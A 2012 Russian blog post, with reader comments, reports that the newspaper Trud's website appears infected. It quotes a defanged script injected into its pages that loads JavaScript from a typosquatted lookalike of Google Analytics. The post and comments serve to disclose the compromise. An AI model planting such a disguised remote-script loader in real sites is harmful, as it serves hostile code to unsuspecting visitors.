Войти в систему

Home
    - Создать дневник
    - Написать в дневник
       - Подробный режим

LJ.Rossia.org
    - Новости сайта
    - Общие настройки
    - Sitemap
    - Оплата
    - ljr-fif

Редактировать...
    - Настройки
    - Список друзей
    - Дневник
    - Картинки
    - Пароль
    - Вид дневника

Сообщества

Настроить S2

Помощь
    - Забыли пароль?
    - FAQ
    - Тех. поддержка



Пишет pe3yc ([info]pe3yc)
@ 2012-02-21 23:00:00


Previous Entry  Add to memories!  Tell a Friend!  Next Entry
¤ Сайт "Труда", похоже, малость заражен
В сорце главной (и других страниц) имеется весьма подозрительный код:

[script type="text/javascript"]
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "gооgle-аnаlityсs.соm/gа.js' type='text/javascript'%3E%3C/script%3E"));
[/script]

(Угловые скобки заменены на квадратные, а некоторые латинские символы на кириллические — во избежание).

Тут надо помнить, что gооgle-аnаlityсs.соm это не gооgle-аnаlуtiсs.соm (который там тоже есть, и вполне безопасен), а совсем другая херь. И хостит эта херь очень нехорошие скриптики.

Поэтому я рекомендую админу "Труда" (если там вообще имеется админ) вычистить говно с сайта. А то как-то нехорошо получается, всё-таки федеральное СМИ..


(Читать комментарии) - (Добавить комментарий)


[info]pe3yc@lj
2012-02-21 22:31 (ссылка)
На каждой странице? Очень маловероятно. И захостить malware script в соответствующем месте - это тоже жопорукость?

(Ответить) (Уровень выше) (Ветвь дискуссии)


[info]antontsau@lj
2012-02-21 22:38 (ссылка)
там надо смотреть куды оно вставлено. Если там вполне осмысленно использование правильного сайта то скорее жопоручие, воткнул и не проверил, а если просто воткнуто где попало по всем страницам - то это черви и жабы адназначна.

(Ответить) (Уровень выше)


[info]maravan@lj
2012-02-22 01:41 (ссылка)
А что, по вашему, они каждую страницу руками делают?
Воткнули в шаблон - и вперед.

(Ответить) (Уровень выше)


(Читать комментарии) -